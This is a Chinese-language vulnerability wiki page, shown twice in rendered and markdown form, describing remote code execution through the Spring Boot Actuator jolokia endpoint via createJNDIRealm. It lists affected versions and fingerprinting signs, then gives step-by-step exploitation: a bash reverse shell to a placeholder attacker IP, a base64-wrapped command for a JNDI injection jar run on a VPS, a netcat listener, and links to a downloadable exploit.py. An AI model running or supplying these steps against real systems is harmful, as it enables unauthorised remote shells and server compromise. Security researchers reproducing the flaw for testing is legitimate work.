fofamini-wiki

登录白背景

源码

Spring Boot jolokia Realm JNDI远程代码执行漏洞

一、漏洞简介

Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时，它会自动将多个端点注册到路由进程中。当配置jolokia/list接口，且访问jolokia/list接口存在type=MBeanFactory和createJNDIRealm关键字时，存在Spring jolokia Realm JNDI远程代码执行漏洞。

二、影响版本

Spring Boot < 1.5 默认未授权访问所有端点
Spring Boot >= 1.5 默认只允许访问/health和/info端点，但是此安全性通常被应用程序开发人员禁用

Spring Boot 1.x版本端点在根URL下注册。

Spring Boot 2.x版本端点移动到/actuator/路径。

三、系统特征

网站图片文件是一个绿色的树叶。

特有的报错信息。

存在/jolokia/list接口

四、漏洞复现

确认存在type=MBeanFactory和createJNDIRealm关键字时，存在Spring jolokia Realm JNDI远程代码执行漏洞

生成反弹shell命令

/bin/bash -i >& /dev/tcp/xx.xx.xx.xx/7777 0>&1

将上述反弹shell命令base64编码后替换到下述command字符处，vps处填写为vps ip

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,command}|{base64,-d}|{bash,-i}" -A "vps"

将JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar上传到vps中运行上述命令

JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

修改 expliot 中的 url 和 rmi 地址

exploit.py

nc 监听端口

nc -lvvp 7777

执行exp收到反弹shell

python3 exploit.py

原文: https://www.yuque.com/xiaokp7/ocvun2/asne342gkdk4cde8

# Spring Boot jolokia Realm JNDI远程代码执行漏洞

# 一、漏洞简介
Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时，它会自动将多个端点注册到路由进程中。当配置`jolokia/list`接口，且访问`jolokia/list`接口存在`type=MBeanFactory`和`createJNDIRealm`关键字时，存在`Spring jolokia Realm JNDI`远程代码执行漏洞。

## 二、影响版本

- Spring Boot < 1.5 默认未授权访问所有端点
- Spring Boot >= 1.5 默认只允许访问/health和/info端点，但是此安全性通常被应用程序开发人员禁用

Spring Boot 1.x版本端点在根URL下注册。
![image.png](./img/lD151wknq39V0bAQ/1698576714277-71a73073-04b0-4a3c-966d-bba57e4944b9-260351.png)
Spring Boot 2.x版本端点移动到/actuator/路径。
![image.png](./img/lD151wknq39V0bAQ/1698576733486-183446b7-1066-4c12-9181-e16cb0df831d-695567.png)

# 三、系统特征

1. 网站图片文件是一个绿色的树叶。

![image.png](./img/lD151wknq39V0bAQ/1698576979706-f936398d-5236-4f6d-a518-474733394877-162628.png)

2. 特有的报错信息。

![image.png](./img/lD151wknq39V0bAQ/1698576999220-8efdd199-4150-4cab-80c5-6d727340149c-318600.png)

3. 存在`/jolokia/list`接口

![image.png](./img/lD151wknq39V0bAQ/1698577033216-3270b605-0da8-421d-97f8-cfc8baa55626-184876.png)

# 四、漏洞复现

1. 确认存在`type=MBeanFactory`和`createJNDIRealm`关键字时，存在Spring jolokia Realm JNDI远程代码执行漏洞

![image.png](./img/lD151wknq39V0bAQ/1698577944981-d1cd174f-c5f9-4361-9b31-2c765873cdf8-433297.png)
![image.png](./img/lD151wknq39V0bAQ/1698578013109-7e54d965-932c-4f56-80c0-9d1d0fd17a52-802269.png)

2. 生成反弹shell命令
```
/bin/bash -i >& /dev/tcp/xx.xx.xx.xx/7777 0>&1
```

2. 将上述反弹shell命令base64编码后替换到下述`command`字符处，`vps`处填写为`vps ip`
```
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,command}|{base64,-d}|{bash,-i}" -A "vps"
```

3. 将`JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar`上传到vps中运行上述命令

[JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222253187-2cb205fa-03a1-4c83-b20d-15ef97031929.jar?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fjar%2F1622799%2F1709222253187-2cb205fa-03a1-4c83-b20d-15ef97031929.jar%22%2C%22name%22%3A%22JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar%22%2C%22size%22%3A10356971%2C%22ext%22%3A%22jar%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u0a97da36-98e9-46bc-9a57-48c651e9d28%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fjava-archive%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u39d3eb73%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
![image.png](./img/lD151wknq39V0bAQ/1698577387014-60a6f59b-e08b-46ae-8cd0-2adbd24dc7dc-459077.png)

4. 修改 expliot 中的 url 和 rmi 地址

[exploit.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709222253494-e1aea116-ca7d-4438-bcaa-3c9b5188ff09.py?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fpy%2F1622799%2F1709222253494-e1aea116-ca7d-4438-bcaa-3c9b5188ff09.py%22%2C%22name%22%3A%22exploit.py%22%2C%22size%22%3A1313%2C%22ext%22%3A%22py%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22ud423ff87-d94a-46bf-9d80-28f0dd3966b%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22text%2Fx-python-script%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u73fdd248%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
![image.png](./img/lD151wknq39V0bAQ/1698577518599-c06c9711-aace-4078-a8f8-ec67e5d0e4a8-345711.png)
![image.png](./img/lD151wknq39V0bAQ/1698577467774-16a487a1-d095-4973-ac7e-9320596f094f-211549.png)

4. nc 监听端口
```
nc -lvvp 7777
```
![image.png](./img/lD151wknq39V0bAQ/1698577554789-09ca2754-5c88-4810-8889-e9c6b9fbe0d1-128933.png)

5. 执行exp收到反弹shell
```
python3 exploit.py
```
![image.png](./img/lD151wknq39V0bAQ/1698577713992-325f1991-81a1-4e32-9088-607fffc268ef-105198.png)
![image.png](./img/lD151wknq39V0bAQ/1698577666540-851adfb8-d788-44e5-807b-276e44ee32a4-367263.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/asne342gkdk4cde8>